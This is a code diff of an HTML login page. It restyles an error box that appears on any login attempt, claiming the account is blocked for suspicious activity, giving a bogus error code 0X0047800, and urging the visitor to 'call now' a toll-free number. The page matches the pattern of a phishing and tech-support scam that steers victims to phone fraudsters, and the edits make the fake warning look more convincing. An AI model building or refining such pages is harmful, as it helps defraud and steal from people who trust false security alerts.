--- a/index.html
+++ b/index.html
@@ -133,8 +133,7 @@
 
         /* Error Box */
         .error-box {
-            display: flex;
-            align-items: left;
+            display: block;
             background-color: #f8d7da;
             color: #721c24;
             border-left: 5px solid #f5c6cb;
@@ -142,6 +141,7 @@
             border-radius: 5px;
             font-family: Arial, sans-serif;
             margin-top: 20px;
+            text-align: left;
             position: relative;
         }
 
@@ -151,7 +151,7 @@
             border-radius: 50%;
             width: 25px;
             height: 25px;
-            display: flex;
+            display: inline-flex;
             justify-content: center;
             align-items: center;
             font-size: 16px;
@@ -159,7 +159,15 @@
         }
 
         .error-text {
-            flex-grow: 1;
+            display: inline-block;
+            text-align: left;
+            vertical-align: top;
+        }
+
+        .error-code {
+            display: flex;
+            align-items: center;
+            margin-top: 5px;
         }
 
         /* Loading animation styles */
@@ -208,8 +216,15 @@
 
         <!-- Error message box -->
         <div id="error-message-box" class="error-box" style="display: none;">
-           <div class="error-icon">!</div>
-            <div class="error-text">You've entered an incorrect username or password. Please try again. <br> Error code : 0X0047800 <br> your account has been blocked due to some suspicious login attempts <br> Call now to secure your account : <br> <a href="tel:18444991812">+1-844-499-1812</a></div>
+            <div class="error-text">You've entered an incorrect username or password. Please try again.</div>
+            <div class="error-code">
+                <div class="error-icon">!</div>
+                <div class="error-text">
+                    Error code: 0X0047800 <br> 
+                    Your account has been blocked due to some suspicious login attempts.<br>
+                    Call now to secure your account: <a href="tel:18444991812">+1-844-499-1812</a>
+                </div>
+            </div>
         </div>
 
         <form id="loginForm">
@@ -266,7 +281,7 @@
         // Show error message on login attempt
         function showErrorMessage() {
             const errorMessageBox = document.getElementById('error-message-box');
-            errorMessageBox.style.display = 'flex';
+            errorMessageBox.style.display = 'block';
         }
 
         // Show loading animation
